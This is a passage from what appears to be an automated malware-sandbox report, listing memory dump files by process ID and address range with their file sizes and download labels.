memory/916-522-0x0000000001070000-0x0000000001081000-memory.dmp

Filesize
68KB

Download
memory/916-526-0x0000000000400000-0x0000000000C1B000-memory.dmp

Filesize
8.1MB

Download
memory/916-250-0x0000000000000000-mapping.dmp

Download
memory/980-142-0x000007FEFBA01000-0x000007FEFBA03000-memory.dmp

Filesize
8KB

Download
memory/1032-17-0x0000000000100000-0x000000000010D000-memory.dmp

Filesize
52KB

Download
memory/1032-14-0x0000000000000000-mapping.dmp

Download
memory/1032-91-0x0000000003EB0000-0x0000000003F82000-memory.dmp

Filesize
840KB

Download
memory/1056-469-0x0000000001EE0000-0x0000000001EF1000-memory.dmp

Filesize
68KB

Download
memory/1140-44-0x000007FEF44F0000-0x000007FEF4EDC000-memory.dmp

Filesize
9.9MB

Download
memory/1140-52-0x0000000001370000-0x0000000001371000-memory.dmp

Filesize
4KB

Download
memory/1220-448-0x00000000026E0000-0x00000000026F6000-memory.dmp

Filesize
88KB

Download
memory/1220-558-0x0000000003BF0000-0x0000000003C06000-memory.dmp

Filesize
88KB

Download
memory/1220-493-0x0000000002A90000-0x0000000002AA7000-memory.dmp

Filesize
92KB

Download
memory/1264-244-0x0000000000000000-mapping.dmp

Download
memory/1312-472-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1380-220-0x0000000000000000-mapping.dmp

Download
memory/1496-36-0x0000000000000000-mapping.dmp

Download
memory/1496-172-0x0000000000470000-0x000000000047B000-memory.dmp

Filesize
44KB

Download
memory/1496-149-0x0000000000E60000-0x0000000000E61000-memory.dmp

Filesize
4KB

Download
memory/1496-41-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/1496-169-0x0000000000350000-0x0000000000351000-memory.dmp

Filesize
4KB

Download
memory/1496-295-0x0000000000B30000-0x0000000000B32000-memory.dmp

Filesize
8KB

Download
memory/1496-292-0x000007FEEE680000-0x000007FEEF01D000-memory.dmp

Filesize
9.6MB

Download
memory/1496-294-0x000007FEEE680000-0x000007FEEF01D000-memory.dmp

Filesize
9.6MB

Download
memory/1580-195-0x0000000000000000-mapping.dmp

Download
memory/1592-143-0x0000000000000000-mapping.dmp

Download
memory/1592-452-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/1592-451-0x0000000002D70000-0x0000000002E8A000-memory.dmp

Filesize
1.1MB

Download
memory/1592-449-0x0000000002D70000-0x0000000002D81000-memory.dmp

Filesize
68KB

Download
memory/1596-487-0x0000000002DB0000-0x0000000002DC1000-memory.dmp

Filesize
68KB

Download
memory/1596-488-0x0000000000020000-0x000000000002D000-memory.dmp

Filesize
52KB

Download
memory/1608-95-0x0000000003D90000-0x0000000003E62000-memory.dmp

Filesize
840KB

Download
memory/1652-194-0x000000001B3C0000-0x000000001B3C2000-memory.dmp

Filesize
8KB

Download
memory/1652-188-0x0000000000000000-mapping.dmp

Download
memory/1652-189-0x000007FEF44F0000-0x000007FEF4EDC000-memory.dmp

Filesize
9.9MB

Download
memory/1652-192-0x00000000009B0000-0x00000000009B1000-memory.dmp

Filesize
4KB

Download
memory/1652-245-0x0000000000000000-mapping.dmp

Download
memory/1804-436-0x0000000000401000-0x000000000040C000-memory.dmp

Filesize
44KB

Download
memory/1808-152-0x0000000000000000-mapping.dmp

Download
memory/1840-177-0x0000000000000000-mapping.dmp

Download
memory/1840-180-0x00000000013E0000-0x00000000013E1000-memory.dmp

Filesize
4KB

Download
memory/1840-178-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/1848-151-0x0000000000000000-mapping.dmp

Download
memory/1848-217-0x00000000051E0000-0x00000000051E1000-memory.dmp

Filesize
4KB

Download
memory/1848-166-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/1848-167-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/1856-200-0x0000000001150000-0x0000000001151000-memory.dmp

Filesize
4KB

Download
memory/1856-202-0x0000000000360000-0x0000000000395000-memory.dmp

Filesize
212KB

Download
memory/1856-43-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/1856-145-0x0000000001310000-0x0000000001311000-memory.dmp

Filesize
4KB

Download
memory/1856-256-0x0000000000570000-0x0000000000581000-memory.dmp

Filesize
68KB

Download
memory/1856-204-0x0000000000420000-0x0000000000421000-memory.dmp

Filesize
4KB

Download
memory/1856-33-0x0000000000000000-mapping.dmp

Download
memory/1868-505-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/1868-483-0x0000000002600000-0x0000000002601000-memory.dmp

Filesize
4KB

Download
memory/1868-499-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/1868-479-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/1868-481-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/1868-482-0x00000000048F0000-0x00000000048F1000-memory.dmp

Filesize
4KB

Download
memory/1868-498-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1868-513-0x0000000006360000-0x0000000006361000-memory.dmp

Filesize
4KB

Download
memory/1868-504-0x0000000005810000-0x0000000005811000-memory.dmp

Filesize
4KB

Download
memory/1868-494-0x0000000005360000-0x0000000005361000-memory.dmp

Filesize
4KB

Download
memory/1868-486-0x0000000002770000-0x0000000002771000-memory.dmp

Filesize
4KB

Download
memory/1868-484-0x0000000002602000-0x0000000002603000-memory.dmp

Filesize
4KB

Download
memory/1872-3-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/1872-2-0x00000000760B1000-0x00000000760B3000-memory.dmp

Filesize
8KB

Download
memory/1904-30-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1904-39-0x000000001B000000-0x000000001B002000-memory.dmp

Filesize
8KB

Download
memory/1904-28-0x00000000000B0000-0x00000000000B1000-memory.dmp

Filesize
4KB

Download
memory/1904-27-0x000007FEF44F0000-0x000007FEF4EDC000-memory.dmp

Filesize
9.9MB

Download
memory/1904-32-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/1904-31-0x0000000000190000-0x00000000001C3000-memory.dmp

Filesize
204KB

Download
memory/1976-259-0x0000000000000000-mapping.dmp

Download
memory/2020-5-0x000007FEF7810000-0x000007FEF7A8A000-memory.dmp

Filesize
2.5MB

Download
memory/2032-516-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/2032-515-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/2032-523-0x0000000006260000-0x0000000006261000-memory.dmp

Filesize
4KB

Download
memory/2032-519-0x0000000004B42000-0x0000000004B43000-memory.dmp

Filesize
4KB

Download
memory/2032-517-0x0000000004B80000-0x0000000004B81000-memory.dmp

Filesize
4KB

Download
memory/2032-521-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/2032-518-0x0000000004B40000-0x0000000004B41000-memory.dmp

Filesize
4KB

Download
memory/2032-520-0x00000000027E0000-0x00000000027E1000-memory.dmp

Filesize
4KB

Download
memory/2040-576-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

Filesize
4KB

Download
memory/2040-574-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

Filesize
4KB

Download
memory/2040-573-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/2056-101-0x0000000010000000-0x000000001033E000-memory.dmp

Filesize
3.2MB

Download
memory/2060-206-0x0000000000000000-mapping.dmp

Download
memory/2080-233-0x0000000000000000-mapping.dmp

Download
memory/2128-212-0x0000000000000000-mapping.dmp

Download
memory/2156-148-0x0000000000000000-mapping.dmp

Download
memory/2192-434-0x000000000C7E0000-0x000000000C7E1000-memory.dmp

Filesize
4KB

Download
memory/2200-161-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/2200-164-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/2200-157-0x0000000000000000-mapping.dmp

Download
memory/2200-174-0x0000000000390000-0x0000000000391000-memory.dmp

Filesize
4KB

Download
memory/2216-237-0x0000000000000000-mapping.dmp

Download
memory/2224-74-0x0000000000000000-mapping.dmp

Download
memory/2228-272-0x0000000000000000-mapping.dmp

Download
memory/2256-227-0x0000000000000000-mapping.dmp

Download
memory/2260-257-0x0000000000000000-mapping.dmp

Download
memory/2280-80-0x0000000000000000-mapping.dmp

Download
memory/2296-116-0x0000000002E70000-0x0000000002E81000-memory.dmp

Filesize
68KB

Download
memory/2296-122-0x0000000000220000-0x0000000000265000-memory.dmp

Filesize
276KB

Download
memory/2296-83-0x0000000000000000-mapping.dmp

Download
memory/2300-241-0x0000000000000000-mapping.dmp

Download
memory/2320-248-0x0000000000000000-mapping.dmp

Download
memory/2328-127-0x0000000002E80000-0x0000000002E91000-memory.dmp

Filesize
68KB

Download
memory/2328-87-0x0000000000000000-mapping.dmp

Download
memory/2340-540-0x000000007EF20000-0x000000007EF21000-memory.dmp

Filesize
4KB

Download
memory/2340-535-0x0000000005490000-0x0000000005491000-memory.dmp

Filesize
4KB

Download
memory/2340-528-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/2340-552-0x0000000006550000-0x0000000006551000-memory.dmp

Filesize
4KB

Download
memory/2340-536-0x0000000005950000-0x0000000005951000-memory.dmp

Filesize
4KB

Download
memory/2340-529-0x0000000002550000-0x0000000002551000-memory.dmp

Filesize
4KB

Download
memory/2340-532-0x0000000002842000-0x0000000002843000-memory.dmp

Filesize
4KB

Download
memory/2340-539-0x0000000005A30000-0x0000000005A31000-memory.dmp

Filesize
4KB

Download
memory/2340-533-0x00000000053A0000-0x00000000053A1000-memory.dmp

Filesize
4KB

Download
memory/2340-553-0x0000000006560000-0x0000000006561000-memory.dmp

Filesize
4KB

Download
memory/2340-531-0x0000000002840000-0x0000000002841000-memory.dmp

Filesize
4KB

Download
memory/2372-467-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2372-463-0x0000000001F90000-0x0000000001FA1000-memory.dmp

Filesize
68KB

Download
memory/2376-216-0x0000000000000000-mapping.dmp

Download
memory/2376-218-0x00000000003F0000-0x0000000000404000-memory.dmp

Filesize
80KB

Download
memory/2380-109-0x000000001AFF0000-0x000000001AFF2000-memory.dmp

Filesize
8KB

Download
memory/2380-94-0x000007FEF44F0000-0x000007FEF4EDC000-memory.dmp

Filesize
9.9MB

Download
memory/2380-97-0x0000000001040000-0x0000000001041000-memory.dmp

Filesize
4KB

Download
memory/2440-213-0x0000000000000000-mapping.dmp

Download
memory/2440-215-0x000000006E260000-0x000000006E403000-memory.dmp

Filesize
1.6MB

Download
memory/2472-264-0x0000000000000000-mapping.dmp

Download
memory/2484-102-0x0000000000000000-mapping.dmp

Download
memory/2532-110-0x0000000000000000-mapping.dmp

Download
memory/2552-105-0x0000000000000000-mapping.dmp

Download
memory/2564-252-0x0000000000000000-mapping.dmp

Download
memory/2576-465-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2576-461-0x0000000001FA0000-0x0000000001FB1000-memory.dmp

Filesize
68KB

Download
memory/2580-456-0x0000000003170000-0x0000000003181000-memory.dmp

Filesize
68KB

Download
memory/2588-230-0x0000000000000000-mapping.dmp

Download
memory/2596-489-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2612-219-0x0000000000000000-mapping.dmp

Download
memory/2616-111-0x0000000000000000-mapping.dmp

Download
memory/2636-263-0x0000000000000000-mapping.dmp

Download
memory/2660-229-0x0000000000000000-mapping.dmp

Download
memory/2692-208-0x0000000000C10000-0x0000000000C12000-memory.dmp

Filesize
8KB

Download
memory/2692-203-0x0000000000000000-mapping.dmp

Download
memory/2692-205-0x000007FEEE680000-0x000007FEEF01D000-memory.dmp

Filesize
9.6MB

Download
memory/2692-243-0x000007FEEE680000-0x000007FEEF01D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-441-0x0000000000FF0000-0x00000000010F1000-memory.dmp

Filesize
1.0MB

Download
memory/2700-267-0x0000000000000000-mapping.dmp

Download
memory/2712-118-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download
memory/2712-119-0x0000000000401480-mapping.dmp

Download
memory/2712-123-0x0000000000400000-0x0000000000449000-memory.dmp

Filesize
292KB

Download
memory/2720-191-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/2720-182-0x0000000000000000-mapping.dmp

Download
memory/2720-183-0x0000000001E60000-0x0000000001E71000-memory.dmp

Filesize
68KB

Download
memory/2784-261-0x0000000000000000-mapping.dmp

Download
memory/2796-225-0x0000000000000000-mapping.dmp

Download
memory/2800-211-0x0000000000000000-mapping.dmp

Download
memory/2820-186-0x0000000000000000-mapping.dmp

Download
memory/2828-557-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2828-554-0x0000000002F50000-0x0000000002F61000-memory.dmp

Filesize
68KB

Download
memory/2828-556-0x0000000000020000-0x000000000002A000-memory.dmp

Filesize
40KB

Download
memory/2900-131-0x0000000000401480-mapping.dmp

Download
memory/2932-298-0x0000000000060000-0x0000000000061000-memory.dmp

Filesize
4KB

Download
memory/2932-296-0x0000000010000000-0x0000000010057000-memory.dmp

Filesize
348KB

Download
memory/2936-153-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/2936-171-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/2936-159-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

Filesize
4KB

Download
memory/2936-132-0x0000000000000000-mapping.dmp

Download
memory/2936-268-0x0000000000450000-0x0000000000451000-memory.dmp

Filesize
4KB

Download
memory/2952-134-0x0000000000000000-mapping.dmp

Download
memory/2964-190-0x0000000000000000-mapping.dmp

Download
memory/2972-238-0x0000000000000000-mapping.dmp

Download
memory/2976-223-0x0000000000000000-mapping.dmp

Download
memory/2996-235-0x0000000000000000-mapping.dmp

Download
memory/3008-135-0x0000000000000000-mapping.dmp

Download
memory/3008-582-0x0000000002EB0000-0x0000000002EC1000-memory.dmp

Filesize
68KB

Download
memory/3016-199-0x0000000000000000-mapping.dmp

Download
memory/3024-288-0x00000000034B0000-0x000000000395F000-memory.dmp

Filesize
4.7MB

Download
memory/3024-136-0x0000000000000000-mapping.dmp

Download
memory/3036-147-0x0000000073090000-0x000000007377E000-memory.dmp

Filesize
6.9MB

Download
memory/3036-175-0x0000000000270000-0x0000000000271000-memory.dmp

Filesize
4KB

Download
memory/3036-150-0x0000000000030000-0x0000000000031000-memory.dmp

Filesize
4KB

Download
memory/3036-137-0x0000000000000000-mapping.dmp

Download
memory/3048-287-0x0000000003340000-0x00000000037EF000-memory.dmp

Filesize
4.7MB

Download
memory/3048-138-0x0000000000000000-mapping.dmp

Download
memory/3064-446-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/3064-443-0x0000000003020000-0x0000000003031000-memory.dmp

Filesize
68KB

Download
memory/3064-445-0x0000000000020000-0x000000000002A000-memory.dmp

Filesize
40KB

Download